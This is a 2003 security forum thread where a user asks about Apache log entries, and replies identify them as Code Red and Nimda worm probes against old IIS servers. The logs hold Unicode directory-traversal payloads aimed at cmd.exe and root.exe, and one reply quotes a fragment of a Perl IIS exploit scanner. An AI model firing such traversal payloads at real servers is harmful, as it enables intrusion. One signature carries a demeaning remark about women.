Apache under attack from IIS server?
Results 1 to 10 of 10

Thread: Apache under attack from IIS server?

  1. #1
    Junior Member
    Join Date
    Jul 2003
    Posts
    2

    Unhappy Apache under attack from IIS server?

    I'm running a little old computer with apache, and I keep getting some very intresting logs in the Apache access.log file...

    [ip] - - [18/11/03:12:36:11 +0000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 302 294
    [ip] - - [18/11/03:12:36:11 +0000] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 276
    [ip] - - [18/11/03:12:36:11 +0000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286
    [ip] - - [18/11/03:12:36:11 +0000] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286
    [ip] - - [18/11/03:12:36:12 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
    [ip] - - [18/11/03:12:36:12 +0000] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317
    [ip] - - [18/11/03:12:36:12 +0000] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317
    [ip] - - [18/11/03:12:36:12 +0000] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333
    [ip] - - [18/11/03:12:36:12 +0000] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 303
    [ip] - - [18/11/03:12:36:13 +0000] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
    [ip] - - [18/11/03:12:36:13 +0000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
    [ip] - - [18/11/03:12:36:13 +0000] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
    [ip] - - [18/11/03:12:36:13 +0000] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
    [ip] - - [18/11/03:12:36:13 +0000] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
    [ip] - - [18/11/03:12:36:14 +0000] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
    [ip] - - [18/11/03:12:36:14 +0000] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300

    Thankfully all are 404 or 400'ed, but Im worried that its doing more than just that. Im actualy worried that its in the system. Im behind two firewalls [software and hardware], but I still feel insecure about it. I want to run the Apache though because I host a few documents off of it...

    If anyone can tell me whats happning in those logs and what could be the attacking party, it would help, because this shows up alot in my logs!


    Thanks for your time in reading this;

    NeoThermic

  2. #2
    Senior Member
    Join Date
    Jan 2002
    Posts
    1,207
    It's a worm.

    Or several worms.

    It's perfectly normal, and happens to all Apache servers on the web all the time. You can safely ignore it

    Slarty

  3. #3
    Junior Member
    Join Date
    Jul 2003
    Posts
    2
    Hmm... so what are they after? There is no root.exe on my computer...

    NeoThermic

  4. #4
    Junior Member
    Join Date
    Aug 2003
    Posts
    5
    As slarty says, its probably a worm, so they are not after you specifically. The worm is searching for any vulnerable computer.
    Worst. Sig. Ever.

  5. #5
    Just a Virtualized Geek MrLinus's Avatar
    Join Date
    Sep 2001
    Location
    Redondo Beach, CA
    Posts
    7,324
    Originally posted here by NeoThermic
    Hmm... so what are they after? There is no root.exe on my computer...

    NeoThermic
    They are after any machine that has the following conditions met:

    a) port 80 open
    b) running IIS
    c) vulnerable version of IIS

    Since you only meet one condition, then you're not going to be affected. It's likely one of the following types of worms/scanner (which a quick visit to Google will help you with info on them):

    Code Red
    Code Red II
    nimda
    Transversal Directory worm (new?)
    Trasversal Directory scanner
    Goodbye, Mittens (1992-2008). My pillow will be cold without your purring beside my head
    Extra! Extra! Get your FREE copy of Insight Newsletter||MsMittens' HomePage

  6. #6
    Senior Member
    Join Date
    Nov 2001
    Posts
    4,786
    unpatched iis servers are vulnerable to a directory transversal using unicode (..%c1%9c ). these worms, the most common are the code red varity, dont bother to check if your running iis or not. they just run their scripts. you can expect to see this many more time. its pittiful how many people dont patch their machines but for you it really is nothing for you to worry about.

    root.exe is nothing more than cmd.exe renamed and placed in a web directory that executables are allowed to run in to make it easier to break into latter on
    Bukhari:V3B48N826 “The Prophet said, ‘Isn’t the witness of a woman equal to half of that of a man?’ The women said, ‘Yes.’ He said, ‘This is because of the deficiency of a woman’s mind.’”

  7. #7
    Senior Member
    Join Date
    Aug 2003
    Posts
    185
    and again...this is no worm,just an iis-scanner looking for the unicode hole or even cracked iis.
    (copy of cmd.exe ->root.exe to bypass the output restrictions)
    well, i think i've got a deja vu ?
    Industry Kills Music.

  8. #8
    Senior Member
    Join Date
    Mar 2003
    Location
    central il
    Posts
    1,779
    Fun littel game is to create a root.exe file in the requested directory. Now they will execute that file I am sure if you control what it dose on execution you can have a lot of fun with it.
    Who is more trustworthy then all of the gurus or Buddha’s?

  9. #9
    Senior Member
    Join Date
    Nov 2001
    Posts
    4,786
    stranger i have to disagree. codered doesnt check for an iis string while most automated tools do and if you mean some sk just scanning a broad range of ips not checking i think the number of infected servers is far greater than kiddies doing that (although i could be wrong. im makeing this judgement based on people i know):

    =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

    # Server string subroutine.
    sub server {
    my $X;
    print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
    print "\nTrying to obtain IIS Server string ...";
    $probe = "string";
    my $output;
    my $webserver = "something";
    &connect;
    for ($X=0; $X<=10; $X++){
    $output = $results[$X];
    if (defined $output){
    if ($output =~/IIS/){ $webserver = "iis" };
    };
    };
    if ($webserver ne "iis"){
    print "\a\a\n\nWARNING : UNABLE TO GET IIS SERVER STRING.";
    print "\nThis Server may not be running Micro\$oft IIS WebServer";
    print "\nand therefore may not be exploitable using the";
    print "\nUnicode Bug.";
    print "\n\n\nDo You Wish To Cont ... [Y/N]";
    my $choice = <STDIN>;
    chomp $choice;
    if ($choice =~/N/i) {&exit};
    }else{
    print "\n\nOK ... It Seems To Be Micro\$oft IIS.";
    };

    =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

    although the GET reguests are identical line for line

    http://isp-lists.isp-planet.com/isp-.../msg00005.html

    and from http://cis.tamu.edu/security/microsoft/Nimda.html

    DETAILS OF IIS PROPAGATION:
    A short example of the IIS probes launched by the worm is shown below. These logs were captured by an Apache web server. Note that the pattern repeats itself; some reports indicate that the 16-probe sequence will be repeated against a single target as many as 13 times. Note that the first two attacks show the worm attempting to exploit the root.exe backdoor left by Code Red II or possibly Sadmind infections. The next set of two attacks are also targeting Code Red II backdoors where the root C: and D: drives are mapped to IIS virtual folders, allowing access to cmd.exe.


    "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-""-"
    "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-""-"
    "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-""-"
    "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-""-"
    "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"404 232"-" "-"
    "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/
    c+dir HTTP/1.0" 404 249 "-" "-"
    "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/
    c+dir HTTP/1.0" 404 249 "-" "-"
    etc, etc.


    it's deja vu all over again...Yogi Berra
    Bukhari:V3B48N826 “The Prophet said, ‘Isn’t the witness of a woman equal to half of that of a man?’ The women said, ‘Yes.’ He said, ‘This is because of the deficiency of a woman’s mind.’”

  10. #10
    Senior Member
    Join Date
    Aug 2003
    Posts
    185

    Thumbs up

    @tedob you are right ...i checked my apache logs and on getting scanned there were lot more tryouts.

    aaah...there it is: http://www.antionline.com/showthread...hreadid=250942
    Industry Kills Music.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •